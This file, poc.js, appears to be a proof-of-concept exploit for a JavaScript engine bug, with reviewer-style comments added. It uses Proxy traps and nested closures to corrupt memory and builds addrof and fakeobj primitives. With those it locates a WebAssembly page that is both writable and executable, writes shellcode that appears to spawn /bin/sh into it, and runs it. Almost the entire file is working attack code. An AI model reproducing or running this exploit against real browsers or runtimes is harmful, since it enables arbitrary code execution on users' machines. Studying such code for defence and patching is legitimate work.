poc.js
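/**
 * Runs `code` and reports any exception it throws instead of letting it
 * propagate, so one failing step does not abort the rest of the script.
 *
 * Declared as a function declaration rather than the original undeclared
 * assignment (`callFn = function ...`), which created an implicit global and
 * throws a ReferenceError under strict mode / ES modules. A declaration is
 * hoisted and still yields a global `callFn` binding in a classic script, so
 * later references are unaffected.
 *
 * @param {() => unknown} code - zero-argument callable to invoke; its return
 *   value is discarded.
 * @returns {undefined}
 */
function callFn(code) {
  try {
    code();
  } catch (e) {
    // Log and swallow on purpose: the caller chains several attempts and
    // wants each one reported, not the first one to stop the script.
    console.log(e);
  }
}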
// Module-level proxy with an empty handler (no traps).  run() below declares
// its own `proxy`, so the `proxy[...]` / `proxy.length` reads inside test()
// resolve to this binding, not to run()'s.
let proxy = new Proxy({}, {});
/**
 * Installs a trap named `prop` on a fresh function proxy, then invokes
 * `Reflect[prop]` on that proxy with `args`.
 *
 * The trap is an arrow function whose first parameter is destructured with a
 * default initializer; that initializer immediately calls a second arrow whose
 * own parameter defaults to a function expression.  That innermost function is
 * only assigned as a default and is never called from this file, so its body
 * never executes here; the nesting itself appears to be what the PoC relies on.
 *
 * @param {string} prop - name used both for the handler trap and for the
 *   Reflect method.  "construct" reaches the construct trap; "prop1" is not a
 *   Reflect method, so `Reflect[prop]` is undefined and the final call throws a
 *   TypeError (caught by the callFn wrapper at the call site).
 * @param {...*} args - forwarded to `Reflect[prop]` after the proxy.
 * @returns {undefined}
 */
function run(prop, ...args) {
let handler = {};
// Shadows the module-level `proxy` declared above.
const proxy = new Proxy(function() {}, handler);
handler[prop] = (({
v1 = ((v2 = (function() {
// Both locals shadow the outer `v3`/`callFn` names for this function only.
var v3 = 0;
var callFn = 0;
// `asdf` is not declared anywhere in this file.  Both branches return, so the
// two function expressions below are unreachable even if this body ran.
if (asdf) {
return;
} else {
return;
}
(function() {
v3();
});
(function() {
callFn = "\u0041".repeat(1024 * 32); // mutate "run"
v3 = [1.1, 2.2, 3.3]; // now "proxy" becomes a packed array.
// `v4` and `v5` have no declaration (implicit globals); `v4` is the binding
// that addrof()/fakeobj() in test() read and write.
v4 = [{}].slice();
v5 = [4.4];
})
})) => (1))()
}, ...args) => (1));
Reflect[prop](proxy, ...args);
}
// Each call is wrapped in callFn so a thrown error is logged instead of
// aborting the script.  The second call always throws: Reflect has no method
// named "prop1", so `Reflect[prop]` is undefined when run() tries to call it.
callFn((() => (run("construct", []))));
callFn((() => (run("prop1"))));
/**
 * Main body of the PoC.  It assumes the two run() calls above have already
 * left the engine in a corrupted state in which the module-level `proxy`, the
 * `run` function object and the implicit global `v4` overlap memory they
 * should not.  The only check of that precondition is the single
 * `proxy.length` probe below; everything after it proceeds regardless of the
 * probe's outcome.
 *
 * Uses `print`, which is not defined in this file (a JS-shell builtin; Node
 * and browsers do not provide it).
 *
 * @returns {undefined}
 */
function test() {
// One 8-byte buffer viewed both as a single float64 and as two uint32 words,
// so a double can be reinterpreted as a 64-bit bit pattern and back.
let convert = new ArrayBuffer(0x8);
let f64 = new Float64Array(convert);
let u32 = new Uint32Array(convert);
// Stores v and returns the shared u32 view (not a copy): [low word, high word].
function d2u(v) {
f64[0] = v;
return u32;
}
// Builds the double whose bit pattern is (hi << 32) | lo.
function u2d(lo, hi) {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
// Formats the bit pattern of d as a hex string.  NOTE(review): the combine is
// done in Number arithmetic, so patterns above 2^53 lose their low-order bits
// in the printed value; BigInt would be exact.
function hex(d) {
let val = d2u(d);
return ("0x" + (val[1] * 0x100000000 + val[0]).toString(16));
}
// Raw 32-bit words that the loop at the end copies into `ab` with
// DataView.setUint32, whose byte order defaults to big-endian.
let shellcode = [0x6a6848b8, 0x2f62696e, 0x2f2f2f73, 0x504889e7, 0x68726901, 0x1813424, 0x1010101, 0x31f656be, 0x1010101, 0x81f60901, 0x1014801, 0xe6564889, 0xe631d2b8, 0x01010101, 0x353a0101, 0x01900f05];
// Minimal wasm module instantiated with no imports.  The bytes spell two
// exports, "memory" and "_Z3addii" (an (i32, i32) -> i32 add).
let wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 7, 1, 96, 2, 127, 127, 1, 127, 3, 2, 1, 0, 4, 4, 1, 112, 0, 0, 5, 3, 1, 0, 1, 7, 21, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 8, 95, 90, 51, 97, 100, 100, 105, 105, 0, 0, 10, 9, 1, 7, 0, 32, 1, 32, 0, 106, 11]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports._Z3addii;
// Success probe: writes an element on the `run` function object and checks
// whether the unrelated module-level `proxy` reports it as its length.  Uses
// loose `==`; the branches differ only in the message printed.
run[18] = 0x41414141;
if(proxy.length == 0x41414141){
print("exploit success!\n");
}
else{
print("exploit fail TT\n");
}
// Both helpers go through `v4` and `proxy`.  `v4` is only ever assigned inside
// a function in run() that is never invoked, so unless the engine state has
// been corrupted as described above it is undefined and `v4[0]` throws.
let addrof = function(obj) {
v4[0] = obj;
var leak = proxy[26];
return leak;
}
let fakeobj = function(addr) {
proxy[26] = addr;
var obj = v4[0];
return obj;
}
let ab = new ArrayBuffer(0x100);
let abAddr = addrof(ab);
print("array buffer : " + hex(abAddr));
let wasmObj = addrof(f) - u2d(0x108, 0);
// Implicit global (no declaration).
doubleMap = proxy[34];
// Four-element double array whose slots are the values computed above.
var fake = [
doubleMap, 0,
wasmObj, u2d(0, 0x8)
].slice();
var fakeAddr = addrof(fake) - u2d(0x20, 0);
print("fake_addr : " + hex(fakeAddr));
// From here on the code reads and writes through `target`, the object
// materialised from `fakeAddr`.  What those slots denote depends on the
// engine's internal object layout, which this file does not document.
var target = fakeobj(fakeAddr);
let rwx = target[0];
print("rwx : " + hex(rwx));
fake[2] = abAddr + u2d(0x10, 0);
target[0] = rwx;
// Copies the words into `ab` (big-endian, 4 bytes each) and then calls the
// wasm export.
let dv = new DataView(ab);
for (var i = 0; i < shellcode.length; i++) {
dv.setUint32(i * 4, shellcode[i]);
}
f();
}
// Entry point; runs after both callFn(run(...)) calls above have completed.
test();